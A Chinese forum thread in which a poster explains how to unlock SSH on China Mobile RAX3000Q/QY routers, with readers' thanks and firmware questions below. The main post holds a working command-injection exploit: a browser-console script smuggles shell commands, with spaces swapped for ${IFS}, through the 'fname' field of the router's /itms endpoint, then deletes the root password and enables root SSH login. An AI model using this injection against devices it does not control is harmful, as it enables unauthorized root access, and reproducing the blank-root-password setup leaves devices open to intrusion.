移动RAX3000Q/QY永久解锁SSH(简化版本)/含不死uboot/含openwrt固件

SilenceRet · 发表于 2025-9-6 13:25

本帖最后由 SilenceRet 于 2025-10-3 01:12 编辑

'诊断页面'执行命令方法失效:

网络上大多数都是说在'诊断'页面开启,我这个貌似不行了,过滤掉了,会提示'格式错误'

然后发现了这个方法,利用url post数据注入的方式

参考:https://xiaowang2004.xyz/posts/%E4%B8%AD%E5%9B%BD%E7%A7%BB%E5%8A%A8RAX3000QY%E8%A7%A3%E9%94%81ssh%E5%B9%B6%E5%9B%BA%E5%8C%96/
玩完整个流程后,发现可以直接post数据解决所有问题.

移动RAX3000Q/QY永久解锁SSH(简化版本):

登录路由器web管理
打开浏览器开发者工具,随便选中一个itms项,得到sessionId
然后直接在控制台执行脚本(粘贴脚本到开发者工具的控制台中按回车即可执行):
记得替换你的sessionId字符串
1. {
2. const sessionId = "04ff9afd911be3d3b9232dce7febd48e"; //替换为你的sessionId
5. const commands = [
6. "passwd -d root",
7. "uci set dropbear.@dropbear[0].PasswordAuth='on'",
8. "uci set dropbear.@dropbear[0].RootPasswordAuth='on'",
9. "uci set dropbear.@dropbear[0].Port='22'",
10. "uci set dropbear.@dropbear[0].enable='1'",
11. "uci commit dropbear",
12. "/etc/init.d/dropbear enable",
13. "/etc/init.d/dropbear start"
14. ];
16. const shellCmd = commands.map(cmd => cmd.replace(/ /g, "${IFS}")).join(";");
19. fetch("/itms", {
20. method: "POST",
21. headers: {
22. "Content-Type": "application/json",
23. },
24. body: JSON.stringify({
25. cmd: 22,
26. fname: "websys.log |" + shellCmd,
27. method: "get",
28. sessionId: sessionId,
29. }),
30. })
31. .then((response) => response.json())
32. .then((data) => {
33. console.log("服务器返回:", data);
34. })
35. .catch((error) => {
36. console.error("请求失败:", error);
37. });
38. }
复制代码
执行成功后截图:
执行成功后,无意外的话,可以使用ssh软件登录路由器了.

该脚本包含命令:

清空root密码
开启ssh
ssh开机启动.

路由器标签:

附上成功刷入的uboot:

游客，如果您要查看本帖隐藏内容请回复

可用固件(刷入到了3个设备,2022.3月份的与10月份生产的):
https://github.com/kkstone/Actions-OpenWrt-RAX3000Q

另外这里也有个固件,之前CR8808用的就是这个固件一直在用,没有三方软件非常干净
经测试可用,但wifi 5G不能使用160MHz,使用80MHz无线速度在实际应用场景中没有什么差别
注意看文件名,选择带qsdk版本中的带cmcc字样的(不要选redmi)
https://github.com/hzyitc/openwrt-redmi-ax3000/releases

相关文件下载:

游客，如果您要查看本帖隐藏内容请回复

66666666666 · 发表于 2025-9-6 20:58

感谢大佬分享666，大佬能分享下rootfs备份固件吗？

SilenceRet · 发表于 2025-9-6 23:40

66666666666 发表于 2025-9-6 20:58
感谢大佬分享666，大佬能分享下rootfs备份固件吗？

上传了.

66666666666 · 发表于 2025-9-7 03:03

SilenceRet 发表于 2025-9-6 23:40
上传了.

感谢~

zcfyyj · 发表于 2025-9-7 12:09

谢谢

银河系 · 发表于 2025-9-7 15:32

大佬的贴真是及时雨

mysmha · 发表于 2025-9-8 00:17

看看，，，谢谢分享！！！

jry945 · 发表于 2025-9-8 11:09

这个是10还是4的版本，如果是能用这个方法吗

wxyaa · 发表于 2025-9-8 18:44

移动RAX3000Q/QY永久解锁SSH

awalol · 发表于 2025-9-8 22:27

感谢需要的

jjdul · 发表于 2025-9-9 10:32

rax3000qy, 先后刷了uboot、大分区和nwrt固件后，不能重新进入uboot界面，请问有类似情况的网友吗？

无烟 · 发表于 2025-9-10 14:15

看看

无边牛猴347 · 发表于 2025-9-10 19:43

趁还新鲜赶紧看看

lt522712278 · 发表于 2025-9-12 01:51

大佬厉害啊

lt522712278 · 发表于 2025-9-12 05:44

方法好用一步到位，就是下载的固件解压失败是什么鬼

账号		自动登录	找回密码
密码			立即注册

移动RAX3000Q/QY永久解锁SSH(简化版本)/含不死uboot/含openwrt固件

本帖子中包含更多资源

相关帖子

点评

点评

欢迎大家光临恩山无线论坛 /1